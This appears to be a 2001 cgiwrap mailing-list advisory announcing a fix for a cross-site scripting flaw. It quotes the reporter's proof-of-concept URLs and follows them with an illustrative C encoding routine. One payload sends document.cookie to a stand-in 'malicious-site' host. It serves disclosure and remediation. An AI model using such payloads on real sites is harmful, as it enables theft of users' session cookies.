From: Nathan Neulinger (nneulumr.edu)
Date: Sun Jul 22 2001 - 12:39:03 CDT


    The following cross-site scripting vulnerability was reported in
    cgiwrap. This has been corrected in version 3.7, which has just been
    released.

    http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

    All error message output is now html encoded to prevent this problem.

    -- Nathan

    > "TAKAGI, Hiromitsu" wrote:
    > >
    > > Hi,
    > >
    > > I found a cross-site scripting vulnerability in CGIWrap. Cookies
    > > issued by the server on which CGIWrap is installed can be stolen.
    > >
    > > Please try to access the following URLs.
    > >
    > > Confirming the bug:
    > > http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
    > > http://www.unixtools.org/cgi-bin/cgiwrap/>
    > >
    > > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>TEST</S>
    > > JavaScript code will be executed:
    > >
    > > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>alert(document.domain)</SCRIPT>
    > >
    > > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>document.write(document.domain)</SCRIPT>
    > >
    > > http://www.unixtools.org/cgi-bin/cgiwrap/)>
    > > Stealing your Cookies issued by www.unixtools.org, if any:
    > >
    > > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
    > >
    > > <snip>
    > >
    > > Regards,
    > > --
    > > Hiromitsu Takagi, Ph.D.
    > > National Institute of Advanced Industrial Science and Technology,
    > > Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
    > > http://www.etl.go.jp/~takagi/
    >
    > _______________________________________________
    > cgiwrap-users mailing list
    > cgiwrap-userslists.sourceforge.net
    > http://lists.sourceforge.net/lists/listinfo/cgiwrap-users

    -- 
    ------------------------------------------------------------
    Nathan Neulinger                       EMail: nneulumr.edu
    University of Missouri - Rolla         Phone: (573) 341-4841
    CIS - Systems Programming              Fax: (573) 341-4216
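The fix Nathan describes is to HTML-encode every error message before it is written, so that a request path echoed into the error page is rendered as literal text rather than as markup. The C below is an added illustration of that approach and is not cgiwrap's own source: the names html_encode and build_error_page, the buffer sizes and the "Could not execute script" wording are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not cgiwrap's code. Encode the five HTML metacharacters so
 * that request-derived text can be placed in an error page as literal text.
 * Returns the length the full encoding needs (excluding the NUL), like
 * snprintf, so the caller can detect truncation. */
size_t html_encode(const char *in, char *out, size_t outlen)
{
    size_t needed = 0, written = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char one[2] = { (char)*p, '\0' };
        const char *rep = one;
        switch (*p) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t rl = strlen(rep);
        /* Copy only whole entities that still leave room for the NUL; once one
         * does not fit, stop writing so no partial entity reaches the page. */
        if (written == needed && written + rl < outlen) {
            memcpy(out + written, rep, rl);
            written += rl;
        }
        needed += rl;
    }
    if (outlen)
        out[written] = '\0';
    return needed;
}

/* Build an error page body. The script name is taken from the request path,
 * so it is attacker-controlled and is encoded before it is interpolated.
 * Returns the page length, or -1 if either buffer would be truncated. */
int build_error_page(const char *script, char *page, size_t pagelen)
{
    char safe[512];
    if (html_encode(script, safe, sizeof safe) >= sizeof safe)
        return -1;
    int n = snprintf(page, pagelen,
                     "<html><body><h1>CGIWrap Error</h1>\n"
                     "<p>Could not execute script: %s</p></body></html>\n", safe);
    return (n < 0 || (size_t)n >= pagelen) ? -1 : n;
}
```

Refusing to emit a truncated page (rather than cutting an entity in half) matters because a partial entity such as "&lt" followed by attacker text can again be parsed as markup by a lenient browser.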